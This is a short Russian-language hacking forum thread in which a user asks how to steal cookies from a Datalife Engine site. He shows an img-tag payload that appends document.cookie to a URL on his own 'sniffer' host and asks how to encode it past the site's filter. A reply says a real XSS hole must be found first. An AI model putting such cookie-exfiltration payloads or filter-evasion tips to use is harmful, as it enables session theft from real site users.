Вопрос про Datalife Engine

Discussion in 'Веб-уязвимости' started by str71, 18 Feb 2012.

  1. str71

    str71 New Member

    Joined:
    14 Dec 2010
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Вообщем версию сабжа определить не удаётся.
    Есть возможность добавлять изображения в сообщения, в таком виде:
    <img src="www. 1.ru/1.png" />
    Но если я делаю <img src ="путь к снифферу.png?"+document.cookie; />
    То +document.cookie просто вырезается. Вследствие в логе снифера только ИП...

    Подскажите что можно сделать?
     
    #1 str71, 18 Feb 2012
    Last edited: 18 Feb 2012
  2. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    еслибы так можно былобы делать- инет уже б давно был уничтожен
    Искать XSS
     
  3. str71

    str71 New Member

    Joined:
    14 Dec 2010
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    А нельзя как то закодировать или ещё что?
     
  4. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    :D пока не найдеш ксску печеньки не получиш, должен быть алерт - тогда прийдут куки. Вот тебе образец того что должен добиться нажми
     
Loading...